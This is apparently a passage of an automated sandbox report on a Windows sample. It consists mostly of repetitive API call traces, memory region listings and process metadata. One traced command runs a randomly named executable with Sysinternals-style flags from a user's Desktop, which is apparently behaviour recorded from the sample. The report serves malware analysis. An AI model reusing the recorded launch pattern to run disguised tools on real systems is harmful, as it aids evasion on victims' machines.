[0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.280] SetLastError (dwErrCode=0x0) [0296.280] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.281] SetLastError (dwErrCode=0x0) [0296.281] GetLastError () returned 0x0 [0296.282] SetLastError (dwErrCode=0x0) [0296.282] GetLastError () returned 0x0 [0296.282] SetLastError (dwErrCode=0x0) [0296.282] GetLastError () returned 0x0 [0296.282] SetLastError (dwErrCode=0x0) [0296.282] GetLastError () returned 0x0 [0296.282] SetLastError (dwErrCode=0x0) [0296.282] GetLastError () returned 0x0 [0296.282] SetLastError (dwErrCode=0x0) [0296.282] GetLastError () returned 0x0 [0296.282] SetLastError (dwErrCode=0x0) [0296.282] GetLastError () returned 0x0 [0296.282] SetLastError (dwErrCode=0x0) [0296.282] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.287] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x2c, lpOverlapped=0x0) returned 1 [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.290] SetLastError (dwErrCode=0x0) [0296.290] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.291] SetLastError (dwErrCode=0x0) [0296.291] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetLastError () returned 0x0 [0296.292] SetLastError (dwErrCode=0x0) [0296.292] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.295] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x3a, lpOverlapped=0x0) returned 1 [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.298] SetLastError (dwErrCode=0x0) [0296.298] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] SetLastError (dwErrCode=0x0) [0296.299] GetLastError () returned 0x0 [0296.299] GetLastError () returned 0x0 [0296.299] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.302] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x8a, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x8a, lpOverlapped=0x0) returned 1 [0296.311] GetLastError () returned 0x0 [0296.311] GetLastError () returned 0x0 [0296.311] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.314] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x55, lpOverlapped=0x0) returned 1 [0296.320] GetLastError () returned 0x0 [0296.320] GetLastError () returned 0x0 [0296.320] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.322] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x3b, lpOverlapped=0x0) returned 1 [0296.323] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.326] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x38, lpOverlapped=0x0) returned 1 [0296.330] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.331] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x45, lpOverlapped=0x0) returned 1 [0296.333] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.334] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x4a, lpOverlapped=0x0) returned 1 [0296.336] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.337] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x4e, lpOverlapped=0x0) returned 1 [0296.341] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.342] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x48, lpOverlapped=0x0) returned 1 [0296.385] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.386] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x31, lpOverlapped=0x0) returned 1 [0296.394] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe58 | out: phModule=0x14fe58) returned 0 [0296.394] ExitProcess (uExitCode=0x1) Thread: id = 991 os_tid = 0xc40 Process: id = "142" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6e279000" os_pid = "0xc44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0xeac" cmd_line = "C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Journal.exe\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9872 start_va = 0x3c0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 9873 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 9874 start_va = 0x3f0000 end_va = 0x403fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 9875 start_va = 0x410000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 9876 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 9877 start_va = 0x550000 end_va = 0x553fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 9878 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9879 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 9880 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9881 start_va = 0x7e900000 end_va = 0x7e922fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e900000" filename = "" Region: id = 9882 start_va = 0x7e929000 end_va = 0x7e929fff entry_point = 0x0 region_type = private name = "private_0x000000007e929000" filename = "" Region: id = 9883 start_va = 0x7e92a000 end_va = 0x7e92afff entry_point = 0x0 region_type = private name = "private_0x000000007e92a000" filename = "" Region: id = 9884 start_va = 0x7e92d000 end_va = 0x7e92ffff entry_point = 0x0 region_type = private name = "private_0x000000007e92d000" filename = "" Region: id = 9885 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9886 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9887 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 9888 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9889 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9890 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 9891 start_va = 0x570000 end_va = 0x571fff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 9905 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9906 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9907 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9908 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9909 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9910 start_va = 0x590000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 9986 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9987 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9988 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 9989 start_va = 0x7e800000 end_va = 0x7e8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e800000" filename = "" Region: id = 10102 start_va = 0x6d0000 end_va = 0x78dfff entry_point = 0x6d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10103 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10104 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 10105 start_va = 0x5d0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 10106 start_va = 0x790000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 10107 start_va = 0x890000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 10108 start_va = 0x7e926000 end_va = 0x7e928fff entry_point = 0x0 region_type = private name = "private_0x000000007e926000" filename = "" Region: id = 10109 start_va = 0x3d0000 end_va = 0x3d3fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 10211 start_va = 0x3e0000 end_va = 0x3e3fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 10250 start_va = 0x9a0000 end_va = 0xcd6fff entry_point = 0x9a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 992 os_tid = 0xc48 [0296.950] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0296.950] __set_app_type (_Type=0x1) [0296.950] __p__fmode () returned 0x77984d6c [0296.950] __p__commode () returned 0x77985b1c [0296.950] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0296.950] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0296.950] GetCurrentThreadId () returned 0xc48 [0296.950] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc48) returned 0x84 [0296.951] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0296.951] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0296.951] SetThreadUILanguage (LangId=0x0) returned 0x409 [0297.010] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0297.010] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x54faac | out: phkResult=0x54faac*=0x0) returned 0x2 [0297.011] VirtualQuery (in: lpAddress=0x54fab3, lpBuffer=0x54fa64, dwLength=0x1c | out: lpBuffer=0x54fa64*(BaseAddress=0x54f000, AllocationBase=0x450000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0297.011] VirtualQuery (in: lpAddress=0x450000, lpBuffer=0x54fa64, dwLength=0x1c | out: lpBuffer=0x54fa64*(BaseAddress=0x450000, AllocationBase=0x450000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0297.011] VirtualQuery (in: lpAddress=0x451000, lpBuffer=0x54fa64, dwLength=0x1c | out: lpBuffer=0x54fa64*(BaseAddress=0x451000, AllocationBase=0x450000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0297.011] VirtualQuery (in: lpAddress=0x453000, lpBuffer=0x54fa64, dwLength=0x1c | out: lpBuffer=0x54fa64*(BaseAddress=0x453000, AllocationBase=0x450000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0297.011] VirtualQuery (in: lpAddress=0x550000, lpBuffer=0x54fa64, dwLength=0x1c | out: lpBuffer=0x54fa64*(BaseAddress=0x550000, AllocationBase=0x550000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0297.011] GetConsoleOutputCP () returned 0x1b5 [0297.184] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0297.184] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0297.184] _get_osfhandle (_FileHandle=1) returned 0xc0 [0297.184] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0297.184] _get_osfhandle (_FileHandle=1) returned 0xc0 [0297.184] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0297.184] _get_osfhandle (_FileHandle=0) returned 0x38 [0297.184] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0297.341] GetEnvironmentStringsW () returned 0x5d7f48* [0297.342] FreeEnvironmentStringsA (penv="=") returned 1 [0297.342] GetEnvironmentStringsW () returned 0x5d7f48* [0297.342] FreeEnvironmentStringsA (penv="=") returned 1 [0297.342] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x54ea10 | out: phkResult=0x54ea10*=0x94) returned 0x0 [0297.342] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x0, lpData=0x54ea1c*=0x58, lpcbData=0x54ea18*=0x1000) returned 0x2 [0297.342] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x4, lpData=0x54ea1c*=0x1, lpcbData=0x54ea18*=0x4) returned 0x0 [0297.342] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x0, lpData=0x54ea1c*=0x1, lpcbData=0x54ea18*=0x1000) returned 0x2 [0297.342] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x4, lpData=0x54ea1c*=0x0, lpcbData=0x54ea18*=0x4) returned 0x0 [0297.342] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x4, lpData=0x54ea1c*=0x40, lpcbData=0x54ea18*=0x4) returned 0x0 [0297.342] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x4, lpData=0x54ea1c*=0x40, lpcbData=0x54ea18*=0x4) returned 0x0 [0297.342] 